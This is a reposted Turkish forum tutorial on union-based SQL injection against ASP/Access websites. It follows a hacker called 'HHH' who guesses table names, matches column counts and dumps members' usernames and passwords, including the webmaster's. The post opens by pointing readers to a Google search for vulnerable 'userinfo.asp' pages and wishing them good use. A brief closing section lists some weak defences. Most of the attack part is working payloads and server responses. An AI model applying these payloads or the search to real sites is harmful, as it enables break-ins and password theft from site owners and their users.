SQL Enjection Union Açığı

Aşağıda yazanlar alıntıdır ve güzelde işe yarıyor
googlede inurl:userinfo.asp şeklinde arayabilirsiniz
güle güle kullanın.

1. SQL Injection Nedir?
SQL injection, dinamik içerikli, yani; asp,php,jsp… gibi diller ile beraber bir veri tabanı yönetim sisteminin kullanıldığı

web sayfalarında, SQL cümlelerinin yanlış çalışmasına sebep olacak bir takım karakterlerle sistemi yanıltıp, kendi amacınıza

uygun olarak kullanmanızı sağlayan bir hack yöntemidir.

    union select username,password from users where 1=1

ve enter’a basar. Sunucu aşağıdaki gibi bir hata döndürür;

Microsoft OLE DB Provider for ODBC Drivers (0x80040E37)
[Microsoft][ODBC Microsoft Access Driver] The Microsoft Jet database engine cannot find the input table or query ’users’.

Make sure it exists and that its name is spelled correctly.

HHH anladı ki tablo ismini tutturamadı. Ama o genelde kullanılan tablo isimlerini çok iyi biliyor ve deneme yanılmayla bakın

bir süre sonra şu adres satırını yazdığında sunucu ona ne diyor;

    union select username,password from members where 1=1

[Microsoft][ODBC Microsoft Access Driver] The number of columns in the two selected tables or queries of a union query do not

match.

Hmmm… HHH tablo ismini tutturdu ama bu sefer alan sayısını tutturamadı. UNION’ da iki select cümlesindeki alanları eşit

olması gerektiğini hatırlayın. HHH pratik bir yöntem le bunu şu şekilde dener;

    union select 1 from members where 1=1

Yine olmadı;

    select 1,1 from members where 1=1

Olmadı!

    union select 1,1,1 from members where 1=1

Evet!!! Şimdi HHH sayfada şunun gibi bir şey görüyor;

İsim: 1
Soyad: 1
E-posta: 1

Şimdi select içerisinde kullandığı 1 lerin yerine istediği alanları yazması yeterli. Onun istediği kullanıcının adı ve

şifresi. Tecrübesiyle şöyle bir SQL injection satırını browser’ ına yazar;

    union select USERNAME,USERNAME,PASSWORD from members where 1=1

Ve tutturur. Artık gördüğüşey şu;

İsim: KurbanLIK
Soyad:Koyun
E-posta: şifre

HHH bu 10 dakika sonunda sistemi kırmayı başardı. Ama HHH’ ın asıl istediği webmaster’ ın şifresini bulmak. Basit bi şekilde

webmaster ın ID sini bulmak için, onun nick’ ine basar ve gelen sayfadaki adres satırın bakar;



Elbette; ID’ sinin 1 olduğunu öğrendi. Şimdi SQL bilgisini konuşturur

    union select USERNAME,USERNAME,PASSWORD from members where ID=1

İsim: XXX
Soyad: XXX
E-posta: şifre

5. Nasıl korunuruz
-Tablo isimlerinizin başına alias dediğimiz şeyler ekleyin; Yani ‘users’ diye çok genel bir tablo ismi kullanmak yerine

‘fb_users’ gibi isimler kullanın
-www.adres.com/userinfo.asp?ID=1 gibi bir adreste almış olduğunuz ID değerini kontrol edin. Sayısal bir değer bekliyorsanız,

sayısal bir değer aldığınızdan emin olun.
-Her zaman aldığınız değerlerdeki tehlikeli karakterleri sorgulayan bir alt program yazın.
-Biraz zor ancak search engine friendly dediğimiz sisteme yönelerek sitenizi oluşturun.

www.adres.com/userinfo.asp?ID=1

yerine

www.adres.com/userinfo/1

gibi bir yapıdan bahsediyorum. Apache’ de mümkün ama IIS’ te olmaz